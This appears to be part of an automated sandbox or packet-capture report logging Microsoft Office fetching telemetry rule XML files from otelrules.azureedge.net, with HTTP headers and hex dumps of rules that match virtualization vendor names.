                                                                              2024-10-26 06:49:35 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              74192.168.2.44982713.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:34 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:35 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:35 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 419
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                              ETag: "0x8DC582B9C710B28"
                                                                              x-ms-request-id: 97925bc6-b01e-0002-7e3b-261b8f000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064935Z-17c5cb586f6z6tw6g7cmdv30m800000002sg000000008nht
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:35 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              75192.168.2.44982913.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:35 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:35 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:35 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 419
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                              ETag: "0x8DC582BB7F164C3"
                                                                              x-ms-request-id: 03f0aa2d-d01e-007a-29f2-24f38c000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064935Z-15b8d89586f6nn8zb8x99wuenc00000002qg0000000053rc
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:35 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              76192.168.2.44983013.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:35 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:35 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:35 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 477
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                              ETag: "0x8DC582BA48B5BDD"
                                                                              x-ms-request-id: 989513d0-f01e-0096-5813-2610ef000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064935Z-17c5cb586f6qkkscezt8hb00a000000003yg000000001h45
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:35 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              77192.168.2.44983113.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:35 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:35 UTC491INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:35 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 419
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                              ETag: "0x8DC582B9FF95F80"
                                                                              x-ms-request-id: 3c5c3d60-c01e-0066-4c9e-26a1ec000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064935Z-16849878b78wv88bk51myq5vxc000000020g000000003qwd
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache-Info: L1_T2
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:35 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              78192.168.2.44983213.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:35 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:35 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:35 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 472
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                              ETag: "0x8DC582BB650C2EC"
                                                                              x-ms-request-id: 100b0a78-f01e-0003-754e-224453000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064935Z-16849878b78j7llf5vkyvvcehs00000002v0000000001xd5
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:35 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              79192.168.2.44983313.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:35 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:35 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:35 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 468
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                              ETag: "0x8DC582BB3EAF226"
                                                                              x-ms-request-id: 1c275e9e-901e-0048-342c-26b800000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064935Z-17c5cb586f6lxnvg801rcb3n8n00000001d000000000658c
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:35 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              80192.168.2.44983413.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:36 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:36 UTC491INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:36 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 485
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                              ETag: "0x8DC582BB9769355"
                                                                              x-ms-request-id: e574f622-301e-0052-4beb-2565d6000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064936Z-16849878b78hh85qc40uyr8sc80000000200000000004hp3
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache-Info: L1_T2
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:36 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              81192.168.2.44983513.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:36 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:36 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:36 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 411
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                              ETag: "0x8DC582B989AF051"
                                                                              x-ms-request-id: 8e6d5db5-101e-0017-4c27-2747c7000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064936Z-16849878b78hh85qc40uyr8sc800000001w000000000ev3d
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:36 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              82192.168.2.44983613.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:36 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:36 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:36 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 470
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                              ETag: "0x8DC582BBB181F65"
                                                                              x-ms-request-id: 6cbbe1db-401e-0083-6516-26075c000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064936Z-16849878b78fssff8btnns3b14000000020g000000003khm
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:36 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              83192.168.2.44983713.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:36 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:36 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:36 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 502
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                              ETag: "0x8DC582BB6A0D312"
                                                                              x-ms-request-id: fc13fe58-401e-000a-0af3-244a7b000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064936Z-15b8d89586fqj7k5h9gbd8vs9800000002tg000000006gfg
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:36 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              84192.168.2.44983813.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:36 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:36 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:36 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 427
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                              ETag: "0x8DC582BB556A907"
                                                                              x-ms-request-id: d4a93cd8-001e-008d-65f5-24d91e000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064936Z-15b8d89586f4zwgbgswvrvz4vs00000002u0000000008rpd
                                                                              x-fd-int-roxy-purgeid: 0
